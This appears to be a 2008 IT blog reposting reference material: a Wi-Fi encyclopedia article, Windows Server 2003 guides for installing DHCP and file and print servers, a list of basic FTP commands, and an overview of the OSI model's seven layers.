WIFI

Wi-Fi (pronounced wye fye, IPA: /ˈwaɪfaɪ/), a wireless-technology brand owned by the Wi-Fi Alliance, promotes standards with the aim of improving the interoperability of wireless local area network products based on the IEEE 802.11 standards. Common applications for Wi-Fi include Internet and VoIP phone access, gaming, and network connectivity for consumer electronics such as televisions, DVD players, and digital cameras.

The Wi-Fi Alliance, a consortium of separate and independent companies, agrees on a set of common interoperable products based on the family of IEEE 802.11 standards.^[1] The Wi-Fi Alliance certifies products via a set of defined test-procedures to establish interoperability. Those manufacturers with membership of Wi-Fi Alliance and whose products pass these interoperability tests can mark their products and product packaging with the Wi-Fi logo.^[2]

Wi-Fi technologies have gone through several generations since their inception in 1998. The Microsoft Windows, Apple Mac OS X and open source Unix and Linux operating systems support Wi-Fi to different extents.

A Wi-Fi-enabled device such as a PC, game console, cell phone, MP3 player or PDA can connect to the Internet when within range of a wireless network connected to the Internet. The coverage of one or more interconnected access points — called a hotspot — can comprise an area as small as a single room with wireless-opaque walls or as large as many square miles covered by overlapping access points. Wi-Fi technology has served to set up mesh networks, for example, in London.^[3] Both architectures can operate in community networks.^{[citation needed]}

In addition to restricted use in homes and offices, Wi-Fi can make access publicly available at Wi-Fi hotspots provided either free of charge or to subscribers to various providers. Organizations and businesses such as airports, hotels and restaurants often provide free hotspots to attract or assist clients. Enthusiasts or authorities who wish to provide services or even to promote business in a given area sometimes provide free Wi-Fi access. Metropolitan-wide WiFi (Muni-Fi) already has more than 300 projects in process.^[4]

Wi-Fi also allows connectivity in peer-to-peer (wireless ad-hoc network) mode, which enables devices to connect directly with each other. This connectivity mode can prove useful in consumer electronics and gaming applications.

When wireless networking technology first entered the market many problems ensued for consumers who could not rely on products from different vendors working together. The Wi-Fi Alliance began as a community to solve this issue — aiming to address the needs of the end-user and to allow the technology to mature. The Alliance created the branding Wi-Fi CERTIFIED to reassure consumers that products will interoperate with other products displaying the same branding.

Many consumer devices use Wi-Fi. Amongst others, personal computers can network to each other and connect to the Internet, mobile computers can connect to the Internet from any Wi-Fi hotspot, and digital cameras can transfer images wirelessly.

Routers which incorporate a DSL-modem or a cable-modem and a Wi-Fi access point, often set up in homes and other premises, provide Internet-access and internetworking to all devices connected (wirelessly or by cable) to them. One can also connect Wi-Fi devices in ad-hoc mode for client-to-client connections without a router.

As of 2007 Wi-Fi technology had spread widely within business and industrial sites. In business environments, just like other environments, increasing the number of Wi-Fi access-points provides redundancy, support for fast roaming and increased overall network-capacity by using more channels or by defining smaller cells. Wi-Fi enables wireless voice-applications ( VoWLAN or WVOIP). Over the years, Wi-Fi implementations have moved toward “thin” access-points, with more of the network intelligence housed in a centralized network appliance, relegating individual access-points to the role of mere “dumb” radios. Outdoor applications may utilize true mesh topologies. As of 2007 Wi-Fi installations can provide a secure computer networking gateway, firewall, DHCP server, intrusion detection system, and other functions.

Wi-Fi allows LANs to be deployed without cabling for client devices, typically reducing the costs of network deployment and expansion. Spaces where cables cannot be run, such as outdoor areas and historical buildings, can host wireless LANs.

As of 2007 wireless network adapters are built into most modern laptops. The price of chipsets for Wi-Fi continues to drop, making it an economical networking option included in even more devices. Wi-Fi has become widespread in corporate infrastructures, which also helps with the deployment of RFID technology that can piggyback on Wi-Fi.^[5]

Different competitive brands of access points and client network interfaces are inter-operable at a basic level of service. Products designated as “Wi-Fi Certified” by the Wi-Fi Alliance are backwards inter-operable. Wi-Fi is a global set of standards. Unlike mobile telephones, any standard Wi-Fi device will work anywhere in the world.

Wi-Fi is widely available in more than 250,000^{[citation needed]} public hotspots and tens of millions of homes and corporate and university campuses worldwide. WPA is not easily cracked if strong passwords are used and WPA2 encryption has no known weaknesses. New protocols for Quality of Service (WMM) make Wi-Fi more suitable for latency-sensitive applications (such as voice and video), and power saving mechanisms (WMM Power Save) improve battery operation.

Disadvantage

Spectrum assignments and operational limitations are not consistent worldwide. Most of Europe allows for an additional 2 channels beyond those permitted in the U.S. for the 2.4 GHz band. (1–13 vs. 1–11); Japan has one more on top of that (1–14). Europe, as of 2007, was essentially homogeneous in this respect. A very confusing aspect is the fact a Wi-Fi signal actually occupies five channels in the 2.4 GHz band resulting in only three non-overlapped channels in the U.S.: 1, 6, 11, and four in Europe: 1, 5, 9, 13. Equivalent isotropically radiated power (EIRP) in the EU is limited to 20 dBm (0.1 W).

Power consumption is fairly high compared to some other low-bandwidth standards, such as Zigbee and Bluetooth, making battery life a concern.

The most common wireless encryption standard, Wired Equivalent Privacy or WEP, has been shown to be easily breakable even when correctly configured. Wi-Fi Protected Access (WPA and WPA2), which began shipping in 2003, aims to solve this problem and is now available on most products. Wi-Fi Access Points typically default to an “open” (encryption-free) mode. Novice users benefit from a zero-configuration device that works out of the box, but this default is without any wireless security enabled, providing open wireless access to their LAN. To turn security on requires the user to configure the device, usually via a software graphical user interface (GUI). Wi-Fi networks that are open (unencrypted) can be monitored and used to read and copy data (including personal information) transmitted over the network, unless another security method is used to secure the data, such as a VPN or a secure web page. (See HTTPS/Secure Socket Layer.)

Many 2.4 GHz 802.11b and 802.11g Access points default to the same channel on initial startup, contributing to congestion on certain channels. To change the channel of operation for an access point requires the user to configure the device.

Wi-Fi networks have limited range. A typical Wi-Fi home router using 802.11b or 802.11g with a stock antenna might have a range of 32 m (120 ft) indoors and 95 m (300 ft) outdoors. Range also varies with frequency band. Wi-Fi in the 2.4 GHz frequency block has slightly better range than Wi-Fi in the 5 GHz frequency block. Outdoor range with improved (directional) antennas can be several kilometres or more with line-of-sight.

Wi-Fi performance also decreases exponentially as the range increases.

Wi-Fi pollution, or an excessive number of access points in the area, especially on the same or neighboring channel, can prevent access and interfere with the use of other access points by others, caused by overlapping channels in the 802.11g/b spectrum, as well as with decreased signal-to-noise ratio (SNR) between access points. This can be a problem in high-density areas, such as large apartment complexes or office buildings with many Wi-Fi access points. Additionally, other devices use the 2.4 GHz band: microwave ovens, security cameras, Bluetooth devices and (in some countries) Amateur radio, video senders, cordless phones and baby monitors can cause significant additional interference. General guidance to those who suffer these forms of interference or network crowding is to migrate to a WiFi 5 GHz product, (802.11a or the newer 802.11n IF it has 5GHz/11a support) as the 5 GHz band is relatively unused and there are many more channels available. This also requires users to set up the 5 GHz band to be the preferred network in the client and to configure each network band to a different name (SSID).

It is also an issue when municipalities,^[6] or other large entities such as universities, seek to provide large area coverage. This openness is also important to the success and widespread use of 2.4 GHz Wi-Fi.

Interoperability issues between non WiFi brands or proprietary deviations from the standard can disrupt connections or lower throughput speeds on all user’s devices that are within range, to include the non-WiFi or proprietary product.

 Standard devices

An embedded RouterBoard 112 with U.FL-RSMA pigtail and R52 mini PCI Wi-Fi card widely used by wireless Internet service providers (WISPs) in the Czech Republic.

Wireless access points connects a group of wireless devices to an adjacent wired LAN. An access point is similar to a network hub, relaying data between connected wireless devices in addition to a (usually) single connected wired device, most often an ethernet hub or switch, allowing wireless devices to communicate with other wired devices.

Wireless adapters allow devices to connect to a wireless network. These adapters connect to devices using various external or internal interconnects such as PCI, miniPCI, USB, ExpressCard, Cardbus and PC card. Most newer laptop computers are equipped with internal adapters. Internal cards are generally more difficult to install.

Wireless routers integrate a WAP, ethernet switch, and internal Router firmware application that provides IP Routing, NAT, and DNS forwarding through an integrated WAN interface. A wireless router allows wired and wireless ethernet LAN devices to connect to a (usually) single WAN device such as cable modem or DSL modem. A wireless router allows all three devices (mainly the access point and router) to be configured through one central utility. This utility is most usually an integrated web server which serves web pages to wired and wireless LAN clients and often optionally to WAN clients. This utility may also be an application that is run on a desktop computer such as Apple’s AirPort.

Wireless network bridges connect a wired network to a wireless network. This is different from an access point in the sense that an access point connects wireless devices to a wired network at the data-link layer. Two wireless bridges may be used to connect two wired networks over a wireless link, useful in situations where a wired connection may be unavailable, such as between two separate homes.

Wireless range extenders or wireless repeaters can extend the range of an existing wireless network. Range extenders can be strategically placed to elongate a signal area or allow for the signal area to reach around barriers such as those created in L-shaped corridors. Wireless devices connected through repeaters will suffer from an increased latency for each hop. Additionally, a wireless device connected to any of the repeaters in the chain throughput that is limited by the weakest link between the two nodes in the chain from which the connection originates to where the connection ends.

Aerials and connectors

Most commercial devices (routers, access points, bridges, repeaters) designed for home or business environments use either RP-SMA or RP-TNC antenna connectors. PCI wireless adapters also mainly use RP-SMA connectors. Most PC card and USB wireless only have internal antennas etched on their printed circuit board while some have MMCX connector or MC-Card external connections in addition to an internal antenna. A few USB cards have a RP-SMA connector. Most Mini PCI wireless cards utilize Hirose U.FL connectors, but cards found in various wireless appliances contain all of the connectors listed. Many high-gain (and homebuilt antennas) utilize the Type N connector more commonly used by other radio communications methods.

Non-standard devices

Distance records include:

June 2007: 382 km (237 mi) is held by Ermanno Pietrosemoli and EsLaRed of Venezuela, transferring about 3 MB of data between mountain tops of El Aguila and Platillon12.

Swedish space agency:310 km (193 mi), but using 6 watt amplifiers to reach an overhead stratospheric balloon.^{[citation needed]}

Embedded systems

Embedded serial to WiFi module

Wi-Fi availability in the home is on the increase. This extension of the Internet into the home space will increasingly be used for remote monitoring. Examples of remote monitoring include security systems and tele-medicine. In all these kinds of implementation, if the Wi-Fi provision is provided using a system running one of operating systems mentioned above, then it becomes unfeasible due to weight, power consumption and cost issues.

Increasingly in the last few years (particularly as of early 2007), embedded Wi-Fi modules have become available which come with a real-time operating system and provide a simple means of wireless enabling any device which has and communicates via a serial port.

This allows simple monitoring devices – for example, a portable ECG monitor hooked up to a patient in their home – to be created. This Wi-Fi enabled device effectively becomes part of the internet cloud and can communicate with any other node on the internet. The data collected can hop via the home’s Wi-Fi access point to anywhere on the internet.

These Wi-Fi modules are designed so that designers need minimal Wi-Fi knowledge to wireless-enable their products.

Unintended and intended use by outsiders

Main article: Piggybacking (internet access)

During the early popular adoption of 802.11, providing open access points for anyone within range to use was encouraged to cultivate wireless community networks;^[7] particularly since people on average use only a fraction of their upstream bandwidth at any given time. Later, equipment manufacturers and mass-media advocated isolating users to a predetermined whitelist of authorized users—referred to as “securing” the access point.^{[dubious – discuss]}

Wikinews has related news:

Florida man charged with stealing WiFi

Measures to deter unauthorized users include suppressing the AP’s SSID broadcast, allowing only computers with known MAC addresses to join the network, and various encryption standards. Suppressed SSID and MAC filtering are ineffective security methods as the SSID is broadcast in the open in response to a client SSID query and a MAC address can easily be spoofed. If the eavesdropper has the ability to change his MAC address, then he can potentially join the network by spoofing an authorized address.

WEP encryption can protect against casual snooping, but may also produce a misguided sense of security since freely available tools such as AirSnort or aircrack can quickly recover WEP encryption keys. Once it has seen 5-10 million encrypted packets, AirSnort will determine the encryption password in under a second^[8]; newer tools such as aircrack-ptw can use Klein’s attack to crack a WEP key with a 50% success rate using only 40,000 packets. The newer Wi-Fi Protected Access (WPA) and IEEE 802.11i (WPA2) encryption standards do not have any of the serious weaknesses of WEP encryption.

Recreational logging and mapping of other people’s access points has become known as wardriving. It is also common for people to use open (unencrypted) Wi-Fi networks as a free service, termed piggybacking. Indeed, many access points are intentionally installed without security turned on so that they can be used as a free service. These activities do not result in sanctions in most jurisdictions, however legislation and case law differ considerably across the world. A proposal to leave graffiti describing available services was called warchalking. The universal rule is a Wi-Fi Access Point that has not turned on its security is a service that welcomes its free use, while an access point that has turned its security on does not. The burden is on the access point owner to properly configure and control the access to his internet connection. In a Florida court case^{[citation needed]}, owner laziness was determined not to be a valid excuse.

Piggybacking is often unintentional. Most access points are configured without encryption by default, and operating systems such as Windows XP SP2 and Mac OS X may be configured to automatically connect to any available wireless network. A user who happens to start up a laptop in the vicinity of an access point may find the computer has joined the network without any visible indication. Moreover, a user intending to join one network may instead end up on another one if the latter’s signal is stronger. In combination with automatic discovery of other network resources (see DHCP and Zeroconf) this could possibly lead wireless users to send sensitive data to the wrong middle man when seeking a destination (see Man-in-the-middle attack). For example, a user could inadvertently use an insecure network to login to a website, thereby making the login credentials available to anyone listening, if the website is using an insecure protocol like HTTP, rather than a secure protocol like HTTPS.

Wi-Fi and amateur radio

In the U.S., Canada, Australia and Europe, a portion of the 2.4 GHz Wi-Fi radio spectrum is also allocated to amateur radio users. In the U.S., FCC Part 15 rules govern non-licensed operators (i.e. most Wi-Fi equipment users). Under Part 15 rules, non-licensed users must “accept” (i.e. endure) interference from licensed users and not cause harmful interference to licensed users. Amateur radio operators are licensed users, and retain what the FCC terms “primary status” on the band, under a distinct set of rules (Part 97). Under Part 97, licensed amateur operators may construct their own equipment, use very high-gain antennas, and boost output power to 100 watts on frequencies covered by Wi-Fi channels 2-6. However, Part 97 rules mandate using only the minimum power necessary for communications, forbid obscuring the data, and require station identification every 10 minutes. Therefore, output power control is required to meet regulations, and the transmission of any encrypted data (for example https) is questionable.

In practice, microwave power amplifiers are expensive. On the other hand, the short wavelength at 2.4 GHz allows for simple construction of very high gain directional antennas. Although Part 15 rules forbid any modification of commercially constructed systems, amateur radio operators may modify commercial systems for optimized construction of long links, for example. Using only 200 mW link radios and high gain directional antennas, a very narrow beam may be used to construct reliable links with minimal radio frequency interference to other users.

 Question of health risks

Main article: Wireless electronic devices and health

The UK’s Health Protection Agency considers there is no consistent evidence of harm from the low power transmissions of Wi-Fi equipment. Consensus amongst scientists is that there is no evidence of harm, and the continuing calls for more research into the effects on human health remain limited. However, in September 2007, Germany’s Environment Ministry announced that its citizens should minimise their exposure to radiation from Wi-Fi by choosing conventional wired connections,^[9] without any evidence and contrary to current internationally accepted safety criteria. Dr Michael Clark, of the Health Protection Agency, says published research on mobile phones and masts does not add up to an indictment of Wi-Fi:

All the expert reviews done here and abroad indicate that there is unlikely to be a health risk from wireless networks. … When we have conducted measurements in schools, typical exposures from Wi-Fi are around 20 millionths of the international guideline levels of exposure to radiation. As a comparison, a child on a mobile phone receives up to 50 percent of guideline levels. So a year sitting in a classroom near a wireless network is roughly equivalent to 20 minutes on a mobile. If Wi-Fi should be taken out of schools, then the mobile phone network should be shut down, too—and FM radio and TV, as the strength of their signals is similar to that from Wi-Fi in classrooms.^[10]

 History

Wi-Fi uses both single carrier direct-sequence spread spectrum radio technology (part of the larger family of spread spectrum systems) and multi-carrier OFDM (Orthogonal Frequency Division Multiplexing) radio technology. These regulations then enabled the development of Wi-Fi, its onetime competitor HomeRF, and Bluetooth.

Unlicensed spread spectrum was first made available in the US by the Federal Communications Commission in 1985 and these FCC regulations were later copied with some changes in many other countries enabling use of this technology in all major countries.^[11] The FCC action was proposed by Michael Marcus of the FCC staff in 1980 and the subsequent regulatory action took 5 more years. It was part of a broader proposal to allow civil use of spread spectrum technology and was opposed at the time by main stream equipment manufacturers and many radio system operators.

The precursor to Wi-Fi was invented in 1991 by NCR Corporation/AT&T (later Lucent & Agere Systems) in Nieuwegein, the Netherlands. It was initially intended for cashier systems; the first wireless products were brought on the market under the name WaveLAN with speeds of 1 Mbit/s to 2 Mbit/s. Vic Hayes, who held the chair of IEEE 802.11 for 10 years and has been named the ‘father of Wi-Fi,’ was involved in designing standards such as IEEE 802.11b, and 802.11a.

 City wide Wi-Fi

St. Cloud, Florida became the first city in the United States to offer city wide free Wi-Fi,^[12] although many others have plans to offer the service. Corpus Christi, Texas had offered free Wi-Fi until May 31, 2007 when the network was purchased by Earthlink.^[13] Philadelphia is also using Earthlink for its city wide Wi-Fi.^[14] New Orleans had free city wide Wi-Fi shortly after Hurricane Katrina.^[15] City wide Wi-Fi is available in nine cities in the UK, including Leeds, Manchester and London.^[16] Other cities, such as the Minneapolis metro area, have a large number of Wi-Fi hotspots so you can receive good signals anywhere, even if from different sources. In Europe, the City of Luxembourg has a city-wide Wi-Fi network.

Origin and meaning of the term “Wi-Fi”

Despite the similarity between the terms “Wi-Fi” and “Hi-Fi“, statements reportedly made by Phil Belanger of the Wi-Fi Alliance contradict the conclusion that “Wi-Fi” stands for “Wireless Fidelity”.^[17][18][19] According to Belanger, the Interbrand Corporation developed the brand “Wi-Fi” for the Wi-Fi Alliance to use to describe WLAN products that are based on the IEEE 802.11 standards. In Belanger’s words,

Wi-Fi and the yin yang style logo were invented by Interbrand. We [the founding members of the Wireless Ethernet Compatibility Alliance, now called as the Wi-Fi Alliance] hired Interbrand to come up with the name and logo that we could use for our interoperability seal and marketing efforts. We needed something that was a little catchier than ‘IEEE 802.11b Direct Sequence’.^[20]

The Wi-Fi Alliance themselves invoked the term “Wireless Fidelity” with the marketing of a tag line “The Standard for Wireless Fidelity,” but later removed the tag from their marketing. The Wi-Fi Alliance now seems to discourage the propagation of the notion that “Wi-Fi” stands for “Wireless Fidelity”, but it has been referred to as such by the Wi-Fi Alliance in White Papers currently held in their knowledge base: “… a promising market for wireless fidelity (Wi-Fi) network equipment.”^[21] and “A Short History of WLANs.” The association created the Wi-Fi logo to indicate that a product had been certified for interoperability.^[22]

March 4, 2008 Posted by jim11 | Uncategorized | Leave a Comment

How To Install and Configure a DHCP Server in a Workgroup in Windows Server 2003

SUMMARY

loadTOCNode(1, \’summary\’);

This step-by-step article describes how to configure a new Windows Server 2003-based Dynamic Host Configuration Protocol (DHCP) server on a stand-alone server to provide centralized management of IP addresses and other TCP/IP configuration settings for the client computers on a network.

How to Install the DHCP Service

loadTOCNode(2, \’summary\’);Before you can configure the DHCP service, you must install it on the server. DHCP is not installed by default during a typical installation of Windows Standard Server 2003 or Windows Enterprise Server 2003. You can install DHCP either during the initial installation of Windows Server 2003 or after the initial installation is completed.

How to Install the DHCP Service on an Existing Server

loadTOCNode(3, \’summary\’);

1.	Click Start, point to Control Panel, and then click Add or Remove Programs.
2.	In the Add or Remove Programs dialog box, click Add/Remove Windows Components.
3.	In the Windows Components Wizard, click Networking Services in the Components list, and then click Details.
4.	In the Networking Services dialog box, click to select the Dynamic Host Configuration Protocol (DHCP) check box, and then click OK.
5.	In the Windows Components Wizard, click Next to start Setup. Insert the Windows Server 2003 CD-ROM into the computer’s CD-ROM or DVD-ROM drive if you are prompted to do so. Setup copies the DHCP server and tool files to your computer.
6.	When Setup is completed, click Finish.

How to Configure the DHCP Service

loadTOCNode(2, \’summary\’);After you have installed the DHCP service and started it, you must create a scope, which is a range of valid IP addresses that are available for lease to the DHCP client computers on the network. Microsoft recommends that each DHCP server in your environment have at least one scope that does not overlap with any other DHCP server scope in your environment. In Windows Server 2003, DHCP servers in an Active Directory-based domain must be authorized to prevent rogue DHCP servers from coming online. Any Windows Server 2003 DHCP Server that determines itself to be unauthorized will not manage clients.

How to Create a New Scope

loadTOCNode(3, \’summary\’);

1.	Click Start, point to Programs, point to Administrative Tools, and then click DHCP.
2.	In the console tree, right-click the DHCP server on which you want to create the new DHCP scope, and then click New Scope.
3.	In the New Scope Wizard, click Next, and then type a name and description for the scope. This can be any name that you want, but it should be descriptive enough so that you can identify the purpose of the scope on your network (for example, you can use a name such as “Administration Building Client Addresses”). Click Next.
4.	Type the range of addresses that can be leased as part of this scope (for example, use a range of IP addresses from a starting IP address of 192.168.100.1 to an ending address of 192.168.100.100). Because these addresses are given to clients, they must all be valid addresses for your network and not currently in use. If you want to use a different subnet mask, type the new subnet mask. Click Next.
5.	Type any IP addresses that you want to exclude from the range that you entered. This includes any addresses in the range described in step 4 that may have already been statically assigned to various computers in your organization. Typically, domain controllers, Web servers, DHCP servers, Domain Name System (DNS) servers, and other servers, have statically assigned IP addresses. Click Next.
6.	Type the number of days, hours, and minutes before an IP address lease from this scope expires. This determines how long a client can hold a leased address without renewing it. Click Next, and then click Yes, I want to configure these options now to extend the wizard to include settings for the most common DHCP options. Click Next.
7.	Type the IP address for the default gateway that should be used by clients that obtain an IP address from this scope. Click Add to add the default gateway address in the list, and then click Next.
8.	If you are using DNS servers on your network, type your organization’s domain name in the Parent domain box. Type the name of your DNS server, and then click Resolve to make sure that your DHCP server can contact the DNS server and determine its address. Click Add to include that server in the list of DNS servers that are assigned to the DHCP clients. Click Next, and then follow the same steps if you are using a Windows Internet Naming Service (WINS) server, by adding its name and IP address. Click Next.
9.	Click Yes, I want to activate this scope now to activate the scope and allow clients to obtain leases from it, and then click Next.
10.	Click Finish.
11.	In the console tree, click the server name, and then click Authorize on the Action menu.

Troubleshooting

loadTOCNode(2, \’summary\’);The following sections explain how to troubleshoot some of the issues that you may experience when you try to install and configure a Windows Server 2003-based DHCP server in a workgroup.

Clients Cannot Obtain an IP Address

loadTOCNode(3, \’summary\’);If a DHCP client does not have a configured IP address, this typically indicates that the client was not able to contact a DHCP server. This can be caused by a network problem, or because the DHCP server is unavailable. If the DHCP server started and other clients can obtain valid addresses, verify that the client has a valid network connection and that all the related client hardware devices (including cables and network adapters) are working properly.

The DHCP Server Is Unavailable

loadTOCNode(3, \’summary\’);If a DHCP server does not provide leased addresses to clients, it is frequently because the DHCP service did not start. If this is the case, the server may not be authorized to operate on the network. If you were previously able to start the DHCP service, but it has since stopped, use Event Viewer to check the System log for any entries that may explain why you cannot start the DHCP service.

To restart the DHCP service:

1.	Click Start, and then click Run.
2.	Type cmd, and then press ENTER.
3.	Type net start dhcpserver, and then press ENTER.

-or-

1.	Click Start, point to Control Panel, point to Administrative Tools, and then click Computer Management.
2.	Expand Services and Applications, and then click Services.
3.	Locate and then double-click DHCP Server.
4.	Verify that Startup is set to Automatic and that Service Status is set to Started. If not, click Start.
5.	Click OK, and then close the Computer Management window.

March 4, 2008 Posted by jim11 | Uncategorized | Leave a Comment

Steps by step procedure in configuring a file and print server in Windows Server 2003

How To Install and Configure a File and Print Server in Windows Server 2003

 NOTE: You can view these services in the properties for the local area connection.

You can create a Windows Server 2003 file server and print server manually, or you can use the wizards that are provided in the Configure Your Server Wizard administrative tool.

How to Install a File Server on Windows Server 2003 by Using the Configure Your Server Wizard

1.	Click Start, point to Administrative Tools, and then click Configure Your Server Wizard.
2.	Click Next.
3.	Click Next.
4.	Click File server in the Server role box, and then click Next.
5.	On the “File Server Disk Quotas” page, configure any quotas you need to control disk-space usage on the server, and then click Next.
6.	On the “File Server Indexing Service” page, click the indexing configuration that is appropriate for your server, and then click Next.
7.	Click Next.
8.	Click Finish.
9.	The Share a Folder Wizard starts. Click Next.
10.	Click Browse, locate the folder that you want to share, and then click OK.
11.	Click Next.
12.	Type a share name for the folder, and then click Next.
13.	Click one of the basic permissions for the folder, or click Customize to set custom permissions on the folder. Click Finish.
14.	Click Close.

How to Manually Install a File Server on Windows Server 2003

1.	Click Start, and then click Windows Explorer.
2.	Locate the folder that you want to share.
3.	Right-click the folder, and then click Sharing and Security.
4.	Click Share this folder, and then accept the default name or type a different name for the share.
5.	Optionally, configure the number of users who can connect, configure permissions for this folder, and then configure the caching options.
6.	Click OK.
7.	A little hand is displayed in the Windows Explorer window to indicate that the folder is being shared.
8.	Quit Windows Explorer.

Install a Windows Server 2003 Print Server

How to Install a Print Server on Windows Server 2003 by Using the Configure Your Server Wizard

1.	Click Start, point to Administrative Tools, and then click Configure Your Server Wizard.
2.	Click Next.
3.	Click Next.
4.	Click Print server in the Server role box, and then click Next.
5.	On the “Printers and Printer Drivers” page, click the types of Windows clients that your print server will support, and then click Next.
6.	Click Next.
7.	On the “Add Printer Wizard Welcome” page, click Next.
8.	Click Local printer attached to this computer, click to clear the Automatically detect and install my Plug and Play printer check box, and then click Next.
9.	Click the port for your printer, and then click Next.
10.	Click the printer make and model or provide the drivers from the printer manufacturer media, and then click Next.NOTE: If you are prompted to keep or not keep your existing printer driver, either keep the existing driver or replace the existing driver. If you replace the driver, you must provide the manufacturer driver for this printer. Click Next to continue.
11.	Accept the default name of the printer or provide a different name, and then click Next.
12.	Click the Share as option, type the share name, and then click Next.NOTE: This step is optional because you can share the printer later.
13.	You may provide the location of the printer and a comment to make it easier to locate. Click Next to continue.
14.	Click the Print a test page option, click Next, and then click Finish to quit the Add Printer Wizard. Your printer appears in the Printers and Faxes folder.

How to Share a Printer

1.	Click Start, and then click Printers and Faxes.
2.	Right-click the printer that you just installed, and then click Sharing.
3.	Click Share this printer, and then type a share name for the printer.
4.	Optionally, click Additional Drivers, click the operating systems of the client computers that may attach to this printer, and then click OK. By adding drivers for these operating systems, users on client computers can connect to the print server and automatically download the appropriate drivers for this model of printer without having to configure anything.
5.	When you are prompted to do so, insert the Windows Server 2003 CD-ROM.
6.	Click OK to close the printer properties.
7.	Close the Printers and Faxes folder.

How to Manually Install a Print Server on Windows Server 2003

1.	Click Start, point to Settings, and then click Printers.
2.	Double-click Add Printer to start the Add Printer Wizard.
3.	To complete the Add Printer Wizard, repeat steps 7 through 14 in the “Install a Windows Server 2003 Print Server” section of this article

March 4, 2008 Posted by jim11 | Uncategorized | Leave a Comment

FTP COMMAND

I. Opening and closing connection

• ftp - starts an FTP session
• open hostname - connects to the specified host
• close - closes the connection (but not the FTP session!)
• quit - terminates the FTP session

II. Browsing on a remote machine

• dir - gives a full directory listing on the remote machine
• dir test* - displays only files and directories whose name begins with “test…”
• ls - same as dir, but provides a simplified listing of filenames

III. Directories in FTP

• pwd - prints the name of the current remote directory
• cd remote-directory – changes working directory on remote host
• cd .. - moves up one level in the directory structure on the remote host
• lcd directory – changes the default directory on local host

IV. Types of files

• binary - type this command at the FTP prompt to set binary mode before transferring binary files
• For example, use binary mode with the following types of files:
  • SPSS System files
  • SAS Transport files
  • Stata Datasets
  • Graphics files (e.g., *.gif, *.jpg, *.bmp, etc.)
  • Microsoft Office documents (*.doc, *.xls, etc.)
• ascii - type this command at the FTP prompt to set ASCII mode before transferring text files.
• Use the ASCII mode with any of the following:
  • Raw Data (e.g. *.dat or *.txt, codebooks, or other plain text documents)
  • SPSS Portable files
  • HTML files

V. Transferring files

• get test - copies file “test” from remote to local host (from current remote directory to current local directory)
• mget test.* data.dbf - copies files beginning with “test” and the file named data.dbf from remote to local host
• put test - copies file “test” from local to remote host. You musth have write access to the remove host for this to work.
• mput test.* data.dbf - copies files beginning with “test” and the file named data.dbf from local to remote host
• quit - closes connection and terminates FTP session
• If a file name contains spaces (e.g. on your Windows system) you should type the file name in quotation marks ” “,
  but it is strongly recommended to rename such files before FTPing them.

VI. Other Commands

• get test “| more” - displays file “test”
  To make sure you want a document, you can display it with the more command and see the file screen by screen (using the space bar) BEFORE you get a file. To exit out of more , type q.
• prompt - turns off prompting for individual files when using the mget or mput commands.
• If you have mistyped your username or password, use the user command to re-login.
• For a list of all FTP commands type ? at the ftp> prompt.
• For a brief explanation of a command, type help, leave a space,and type the command itself.

March 4, 2008 Posted by jim11 | Uncategorized | Leave a Comment

OSI MODEL

The 7 Layers of the OSI Model

The OSI, or Open System Interconnection, model defines a networking framework for implementing protocols in seven layers. Control is passed from one layer to the next, starting at the application layer in one station, proceeding to the bottom layer, over the channel to the next station and back up the hierarchy.

Application (Layer 7)	This layer supports application and end-user processes. Communication partners are identified, quality of service is identified, user authentication and privacy are considered, and any constraints on data syntax are identified. Everything at this layer is application-specific. This layer provides application services for file transfers, e-mail, and other network software services. Telnet and FTP are applications that exist entirely in the application level. Tiered application architectures are part of this layer.
Presentation (Layer 6)	This layer provides independence from differences in data representation (e.g., encryption) by translating from application to network format, and vice versa. The presentation layer works to transform data into the form that the application layer can accept. This layer formats and encrypts data to be sent across a network, providing freedom from compatibility problems. It is sometimes called the syntax layer.
Session (Layer 5)	This layer establishes, manages and terminates connections between applications. The session layer sets up, coordinates, and terminates conversations, exchanges, and dialogues between the applications at each end. It deals with session and connection coordination.
Transport (Layer 4)	This layer provides transparent transfer of data between end systems, or hosts, and is responsible for end-to-end error recovery and flow control. It ensures complete data transfer.
Network (Layer 3)	This layer provides switching and routing technologies, creating logical paths, known as virtual circuits, for transmitting data from node to node. Routing and forwarding are functions of this layer, as well as addressing, internetworking, error handling, congestion control and packet sequencing.
Data Link (Layer 2)	At this layer, data packets are encoded and decoded into bits. It furnishes transmission protocol knowledge and management and handles errors in the physical layer, flow control and frame synchronization. The data link layer is divided into two sub layers: The Media Access Control (MAC) layer and the Logical Link Control (LLC) layer. The MAC sub layer controls how a computer on the network gains access to the data and permission to transmit it. The LLC layer controls frame synchronization, flow control and error checking.
Physical (Layer 1)	This layer conveys the bit stream – electrical impulse, light or radio signal — through the network at the electrical and mechanical level. It provides the hardware means of sending and receiving data on a carrier, including defining cables, cards and physical aspects. Fast Ethernet, RS232, and ATM are protocols with physical layer components.

RECOMMENDED READING:

• “The OSI Reference Model — Understanding Layers” in Webopedia’s “Did You Know…?” section.
• “Understanding The Data Link Layer” in Webopedia’s “Did You Know…?” section.

Image courtesy of The Abdus Salam International Centre for Theoretical Physics.

March 4, 2008 Posted by jim11 | Uncategorized | Leave a Comment

Microsoft Windows 2003 Server

Step-by-Step Guides

The Microsoft Windows Server 2003 Deployment step-by-step guides provide hands-on experience for many common operating system configurations. The guides begin by establishing a common network infrastructure through the installation of Windows Server 2003, the configuration of Active Directory^®, the installation of a Windows XP Professional workstation, and finally the addition of this workstation to a domain. Subsequent step-by-step guides assume that you have this common network infrastructure in place. If you do not wish to follow this common network infrastructure, you will need to make appropriate modifications while using these guides.

The common network infrastructure requires the completion of the following guides.

•	Part I: Installing Windows Server 2003 as a Domain Controller
•	Part II: Installing a Windows XP Professional Workstation and Connecting It to a Domain

Once the common network infrastructure is configured, any of the additional step-by-step guides may be employed. Note that some step-by-step guides may have additional prerequisites above and beyond the common network infrastructure requirements. Any additional requirements will be noted in the specific step-by-step guide.

Microsoft Virtual PC

The Windows Server 2003 Deployment step-by-step guides may be implemented within a physical lab environment or through virtualization technologies like Microsoft Virtual PC 2004 or Microsoft Virtual Server 2005. Virtual machine technology enables customers to run multiple operating systems concurrently on a single physical server. Virtual PC 2004 and Virtual Server 2005 are designed to increase operational efficiency in software testing and development, legacy application migration, and server consolidation scenarios.

The Windows Server 2003 Deployment step-by-step guides assume that all configurations will occur within a physical lab environment, although most configurations can be applied to a virtual environment without modification.

Applying the concepts provided in these step-by-step guides to a virtual environment is beyond the scope of this document.

Important Notes

